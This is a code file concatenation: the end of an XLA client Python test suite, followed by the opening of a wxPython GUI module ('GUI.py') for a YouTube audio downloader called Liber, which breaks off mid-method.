def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed)), 0)
compiled_c = c.Build().Compile()
xla_client.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(compiled_c)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
# Set Sharding.
c.SetSharding(sharding)
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
# Clear Sharding.
c.ClearSharding()
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
int_dtypes = [
np.int8, np.int16, np.int32, np.int64, np.uint8, np.uint16, np.uint32,
np.uint64
]
float_dtypes = [np.float16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
dlpack_dtypes = int_dtypes + float_dtypes + [bfloat16]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in dlpack_dtypes for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
backend = xla_client.get_local_backend()
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
dlt = xla_client._xla.BufferToDLPackManagedTensor(buffer)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.DLPackManagedTensorToBuffer(dlt, backend.client)
np.testing.assert_array_equal(x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
backend = xla_client.get_local_backend()
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
dlt = xla_client._xla.BufferToDLPackManagedTensor(buffer)
def ConsumeDLPackTensor():
_ = xla_client._xla.DLPackManagedTensorToBuffer(dlt, backend.client)
ConsumeDLPackTensor()
self.assertRaisesRegex(RuntimeError,
".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
class BufferProtocolTest(parameterized.TestCase):
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
backend = xla_client.get_local_backend("cpu")
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should alias.
self.assertTrue((x_ptr & 63) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
buffer2 = xla_client.Buffer.from_pyval(x, backend=backend, force_copy=True)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
backend = xla_client.get_local_backend("cpu")
buffer = xla_client.Buffer.from_pyval(x, backend=backend)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
class ProfilerTest(absltest.TestCase):
def testTraceMe(self):
# TODO(phawkins): These tests just check that the TraceMe context manager
# acts like a context manager and doesn't explode. Ideally we'd check that
# the profiler saw the traceme too.
with xla_client.profiler.TraceMe("test1"):
pass
with xla_client.profiler.TraceMe("test2", foo=123):
pass
with self.assertRaises(ValueError):
with xla_client.profiler.TraceMe("test3"):
raise ValueError("test")
@unittest.skipIf(portpicker is None, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
server = xla_client.profiler.start_server(port)
del server
if __name__ == "__main__":
absltest.main()
|
GUI.py
|
"""
This is module is a GUI created for the Liber module included in this package. It is intended to be used
with the Liber module only.
Copyright (C) Ryan Drew 2015
This module is free software and can be distributed, used and modified under the restrictions of the MIT license, which
should be included in this package.
"""
__author__ = 'ryan'
__version__ = 0.2
import wx
import wx.lib.scrolledpanel as scrolled
import logging
import threading
import StringIO
import Liber
import platform
import os
import sys
# this controls the size of each individual tile and the size that album artwork will be scaled to (w, h)
TILE_SIZE = [wx.DisplaySize()[0] * (2.0/3.0), 160] # 1900
ALBUM_ART_SIZE = (120, 90)
# setup logging
I_am_child = False
for x, y in logging.Logger.manager.loggerDict.items():
if x == '__main__':
I_am_child = True
logger = logging.getLogger('__main___.' + __name__)
break
if I_am_child is False:
logger = logging.getLogger(__name__)
formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')
con = logging.StreamHandler()
con.setLevel(logging.DEBUG)
con.setFormatter(formatter)
logger.addHandler(con)
logger.setLevel(logging.DEBUG)
logger.propagate = False # makes logger only use stream handler
# the following sets up a change album artwork event used to change the album artwork of a tile. Called by multiple
# threads in the Tile Class
myEVT_CHANGE_AA = wx.NewEventType()
EVT_CHANGE_AA = wx.PyEventBinder(myEVT_CHANGE_AA, 1)
class ChangeAAEvent(wx.PyCommandEvent):
"""
Event to signal that the album artwork in a Tile needs to be changed
"""
def __init__(self, etype, eid, value=None):
"""
Create the event object
"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._value = value
def GetValue(self):
"""
Returns the value from the event
"""
return self._value
# the following sets up a change progress bar event that is used to change the progress bar of a tile. Called through
# the download method.
myEVT_UPDATE_PROGRESSBAR = wx.NewEventType()
EVT_UPDATE_PROGRESSBAR = wx.PyEventBinder(myEVT_UPDATE_PROGRESSBAR, 1)
class UpdateProgressBarEvent(wx.PyCommandEvent):
"""
Event to signal that the progress bar in a tile needs to be updated/changed
"""
def __init__(self, etype, eid, value=None):
"""
Create the event object
"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._value = value
def GetValue(self):
"""
Returns the value from the event
"""
return self._value
# the following sets up a reset progress bar and download button event that is used to change their values to their
# defaults after a delay. Called whenever the progress bar's value is 100
myEVT_RESET_PROGRESSBAR_AND_DOWLOADBUTTON = wx.NewEventType()
EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON = wx.PyEventBinder(myEVT_RESET_PROGRESSBAR_AND_DOWLOADBUTTON, 1)
class ResetProgressBarAndDownloadButtonEvent(wx.PyCommandEvent):
"""
Event to signal that the progress bar and the download button need to reset to their default values
"""
def __init__(self, etype, eid, value=None):
"""
Create the event object
"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._value = value
def GetValue(self):
"""
Returns the value from the event
"""
return self._value
class Tile(wx.Panel):
"""
Main GUI Element. Is added into the MainFrame. Pairs with a YTSong class and handles the static texts, text
controls, images and downloading (including progress bars).
"""
def __init__(self, url, parent, *args, **kwargs):
"""
Create the Tile. Parent is expected to be a MainFrame, url is a valid youtube url to be passed to pafy
:param url: URL to bind to through Liber
:param parent: Parent to the Panel (mainly a Frame class, which is defined down below
:param: args: args to pass to the super call
:param: kwargs: kwargs to pass to the super call. If the key 'parentLogger' is found, it will be used as this
the parent logger and the key/value pair will be taken out of kwargs when passed to the super.
"""
try:
self.logger = kwargs["parentLogger"].getChild("Tile:%s" % url[-11:])
del kwargs["parentLogger"]
except KeyError:
self.logger = logger.getChild("Tile:%s" % url[-11:])
# this needs to be added, so that in the case of a TypeError, the logger key will still be
# removed from the kwargs and a logger will still be obtained
except TypeError:
self.logger = logger.getChild("Tile:%s" % url[-11])
del kwargs["parentLogger"]
self.logger.info("Constructing")
super(Tile, self).__init__(parent, *args, **kwargs)
self.URL = url
self.enableDownloads = True
if Liber.ITUNES is not None:
self.downloadPath = Liber.ITUNES
self.tempDownloadPath = Liber.ITUNES_TEMP
elif Liber.DOWNLOADS is not None:
self.downloadPath = Liber.DOWNLOADS
self.tempDownloadPath = Liber.DOWNLOADS
else:
self.downloadPath = None
self.tempDownloadPath = None
self.logger.debug("Video download path: {}, Video temporary download path: {}".format(self.downloadPath,
self.tempDownloadPath))
self.downloadType = Liber.ID_AUDIO
self.logger.debug("Video download type set to its default - Liber.ID_AUDIO")
self.mainSizer = wx.BoxSizer(wx.VERTICAL)
self.metadataSizer = wx.BoxSizer(wx.HORIZONTAL)
self.Bind(EVT_CHANGE_AA, self.onChangeAA)
self.Bind(EVT_UPDATE_PROGRESSBAR, self.onUpdatePB)
self.Bind(EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON, self.onReset)
# Assign metadata. Must be done like this to prevent this tiles metadata from being assigned the same memory
# location as Liber.METADATA
self.metadata = {}
for x, y in Liber.METADATA.items():
self.metadata[x] = y
try:
self.logger.info("Paring with a YTSong class")
self.YTSong = Liber.YTSong(url, log=self.logger.getChild("Liber"))
self.logger.info("Paring complete")
except Exception, e:
self.logger.error("Failure to pair with a YTSong class", exc_info=True)
errorSt = wx.StaticText(self, label="Failure to obtain video: %s" % e)
errorSt.Center()
dialog = wx.MessageDialog(self, "Error", "Failure to obtain the video: %s" % e, style=wx.OK | wx.ICON_ERROR)
dialog.ShowModal()
raise
self.logger.info("Pulling album artwork from video's thumbnail.")
# location of where the album artwork is on the users' system (if file) or a URL
self.artworkSource = self.YTSong.thumb
self.artworkImage = wx.EmptyImage(wx.BITMAP_TYPE_ANY)
self.artwork = wx.StaticBitmap(self, wx.ID_ANY, wx.EmptyBitmap(ALBUM_ART_SIZE[0], ALBUM_ART_SIZE[1]))
self.worker(self.changeAAThread, (self.YTSong.thumb,), {})
self.metadataSizer.Add(self.artwork, proportion=0, flag=wx.ALIGN_LEFT)
self.metadataSizer.Add((10, -1))
num_of_columns = 4.0
max_column_items = 4.0
column_items = 0
vSizer = wx.BoxSizer(wx.VERTICAL)
LINE_SIZE = (TILE_SIZE[0] - (self.artwork.GetSize()[0] + 10*4)) / num_of_columns
for x, y in self.metadata.items():
stLabel = y+':'
tcSize = (LINE_SIZE - self.GetTextExtent(stLabel)[0], -1)
self.metadata[x] = [wx.StaticText(self, wx.ID_ANY, label=stLabel),
wx.TextCtrl(self, wx.ID_ANY, size=tcSize)]
hSizer = wx.BoxSizer(wx.HORIZONTAL)
hSizer.Add(self.metadata[x][0], proportion=0, flag=wx.ALIGN_LEFT)
hSizer.Add(self.metadata[x][1], proportion=0, flag=wx.ALIGN_RIGHT)
vSizer.Add(hSizer)
vSizer.Add((-1, 5)) # a little bit of padding in my life...
column_items += 1
# add the current sizer to the metadata sizer, create a new vertical sizer, reset column_items and
# add one to the columns
if column_items == max_column_items:
self.metadataSizer.Add(vSizer)
self.metadataSizer.Add((10, -1))
vSizer = wx.BoxSizer(wx.VERTICAL)
column_items = 0
# need to do a little bit of cleanup, the loop was mainly used for laziness/convenience.
else:
self.radioIT = wx.RadioButton(self, wx.ID_ANY, label="iTunes")
self.radioIT.SetValue(True)
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownLociTunes, self.radioIT)
self.radioDownload = wx.RadioButton(self, wx.ID_ANY, label="Downloads")
self.Bind(wx.EVT_RADIOBUTTON, self.onChangeDownLocDownloads, self.radioDownload)
self.radioDownloadPath = wx.RadioButton(self, wx.ID_ANY, label="Custom")
